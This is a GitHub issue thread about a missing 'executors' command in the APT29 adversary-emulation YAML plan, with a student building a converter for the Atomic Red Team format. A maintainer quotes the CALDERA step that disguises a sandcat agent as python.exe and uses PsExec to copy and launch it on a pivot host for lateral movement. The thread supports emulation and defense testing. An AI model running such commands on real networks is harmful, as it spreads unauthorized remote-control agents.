Open Guillaume-Muller opened 3 years ago
Hello,
It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 :
platforms:
windows:
psh,pwsh:
command: |
move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
set-location "C:\Program Files\SysinternalsSuite\";
.\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
payloads:
- sandcat.go-windows-upx
Thanks for your fast reply.
I'm currently a student and I'm trying to build a conversion scipt (like "ctid_aep_to_caldera.py") in order to use the yaml file with the Atomic framework. It is easier for me to directly copy the "executor" part because the Atomic yaml file is very similar (exemple below). By the way, don't you have that kind of script to convert to ATOMIC ?
Atomic YAML file : supported_platforms:
name: powershell
Le ven. 2 juil. 2021 à 11:21, Thamane @.***> a écrit :
Hello,
It is missing but it should not be a problem execution wise as the part that is actually executed by caldera is line 1722 https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722 :
platforms: windows: psh,pwsh: command: | move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; set-location "C:\Program Files\SysinternalsSuite\"; .\PsExec64.exe -accepteula \#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; payloads:
- sandcat.go-windows-upx
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues/92#issuecomment-872853848, or unsubscribe https://github.com/notifications/unsubscribe-auth/AUBC73OKTIGHOER5U6X3OU3TVWAKVANCNFSM47WIUHXA .
-- Cordialement.
Guillaume MULLER
Sorry I do not have such a script at hand.
In your case just copying the command at 1722 and pasting it line 1749 will solve your problem. The executors yaml key is not parsed by caldera and is here probably for backward compatibility/cross compatibility for other framework like ATOMIC ? At least it is what is explained in this blog article :
The machine-readable Emulation Plan representation would be implemented in YAML. The YAML format would be as consistent as possible with accepted industry approaches to automated emulation. In the case of our YAML format, we started from the established Red Canary Atomic Red Team format but made some modifications to capture the threat intelligence that informs the emulation and to ensure a direct correlation between the human-readable and machine-readable versions of the Emulation Plan.
In the APT29 yaml file, at line 1749, command of T1105 is missing below the "executors" tag :
line 1746 executors: line 1747 - name: powershell line 1748 command: | line 1749 line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a